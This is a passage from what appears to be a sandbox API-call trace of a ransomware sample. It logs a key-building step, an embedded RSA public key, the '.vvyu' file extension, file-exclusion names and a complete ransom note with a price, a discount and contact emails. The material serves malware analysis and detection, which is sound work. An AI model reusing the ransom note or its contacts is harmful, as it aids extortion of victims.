lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0178.186] GetLastError () returned 0x0 [0178.186] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0178.186] GetLastError () returned 0x0 [0178.187] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0178.187] GetLastError () returned 0x0 [0178.187] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0178.187] GetLastError () returned 0x0 [0178.187] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0178.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26608 | out: hHeap=0x2c0000) returned 1 [0178.187] CryptDestroyHash (hHash=0x2ef9d0) returned 1 [0178.187] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0178.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74700 | out: hHeap=0x2c0000) returned 1 [0178.188] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0178.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3e0) returned 0x2a73d20 [0178.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5ec) returned 0x2a74108 [0178.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2a74108, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0178.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f0) returned 0x2a74700 [0178.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74108 | out: hHeap=0x2c0000) returned 1 [0178.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.189] lstrcpyA (in: lpString1=0x2fd2c8, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0178.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74700 | out: hHeap=0x2c0000) returned 1 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2e930 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2a06e38 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fe4a8 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fe710 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fe978 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29febe0 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29fee48 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29ff0b0 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29ff318 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29ff580 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29ff7e8 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x29ffa50 [0178.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x816) returned 0x2a73d20 [0178.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a74540 [0178.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2a06ce8 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a14d58 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a14fc0 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a15228 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a15490 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a156f8 [0178.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a15960 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a15bc8 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a15e30 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16098 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16300 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x2f5b18 [0178.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x2a72278 [0178.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0178.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x2a73510 [0178.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2c0000) returned 1 [0178.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x2a73d20 [0178.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73510 | out: hHeap=0x2c0000) returned 1 [0178.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x2a74d68 [0178.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x440) returned 0x2a73d20 [0178.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1068) returned 0x2a75390 [0178.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a73d20, cbMultiByte=-1, lpWideCharStr=0x2a75390, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0178.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x2a76400 [0178.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a75390 | out: hHeap=0x2c0000) returned 1 [0178.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2a06ec8 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16568 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a167d0 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16a38 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16ca0 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a16f08 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a17170 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a173d8 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a17640 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a178a8 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a17b10 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80a) returned 0x2a73d20 [0178.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a75390 [0178.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e190 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6328 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x308f80 [0178.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6328 | out: hHeap=0x2c0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ea00 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x2a430f0 [0178.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x308f80 | out: hHeap=0x2c0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05480 [0178.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ea68 [0178.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a430f0 | out: hHeap=0x2c0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x29e39b0 [0178.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea68 | out: hHeap=0x2c0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a401b8 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a054c8 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd8) returned 0x381af0 [0178.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29e39b0 | out: hHeap=0x2c0000) returned 1 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e168 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ea68 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x138) returned 0x2f5b18 [0178.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381af0 | out: hHeap=0x2c0000) returned 1 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05510 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40268 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a402c0 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05558 [0178.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c8) returned 0x2a72278 [0178.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0178.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e190 | out: hHeap=0x2c0000) returned 1 [0178.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0178.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea00 | out: hHeap=0x2c0000) returned 1 [0178.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05480 | out: hHeap=0x2c0000) returned 1 [0178.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0178.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0178.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a054c8 | out: hHeap=0x2c0000) returned 1 [0178.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e168 | out: hHeap=0x2c0000) returned 1 [0178.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0178.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea68 | out: hHeap=0x2c0000) returned 1 [0178.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05510 | out: hHeap=0x2c0000) returned 1 [0178.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40268 | out: hHeap=0x2c0000) returned 1 [0178.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a402c0 | out: hHeap=0x2c0000) returned 1 [0178.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05558 | out: hHeap=0x2c0000) returned 1 [0178.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2c0000) returned 1 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2a06e68 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a17d78 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a17fe0 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a18248 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a184b0 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a18718 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a18980 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a1e588 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a1e7f0 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a1ea58 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x2a1ecc0 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0178.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x2f5b18 [0178.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0178.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x2a77490 [0178.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0178.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x2a79478 [0178.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a77490 | out: hHeap=0x2c0000) returned 1 [0178.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x2a73d20 [0178.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0178.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x2a75ba8 [0178.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.205] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0178.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x590) returned 0x2a73d20 [0178.209] GetLastError () returned 0x0 [0178.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81e) returned 0x2a7b8c8 [0178.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a7b8c8, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0178.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a7c0f0 [0178.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7b8c8 | out: hHeap=0x2c0000) returned 1 [0178.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42430 [0178.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6328 | out: hHeap=0x2c0000) returned 1 [0178.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81e) returned 0x2a7b8c8 [0178.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a7b8c8, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0178.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a7c918 [0178.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7b8c8 | out: hHeap=0x2c0000) returned 1 [0178.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x2a430f0 [0178.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42430 | out: hHeap=0x2c0000) returned 1 [0178.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x814) returned 0x2a73d20 [0178.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0178.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a7b8c8 [0178.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ea68 [0178.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a430f0 | out: hHeap=0x2c0000) returned 1 [0178.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x808) returned 0x2a73d20 [0178.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a73d20, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0178.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a7d140 [0178.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73d20 | out: hHeap=0x2c0000) returned 1 [0178.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x29e39b0 [0178.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea68 | out: hHeap=0x2c0000) returned 1 [0178.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.233] RtlAllocateHeap 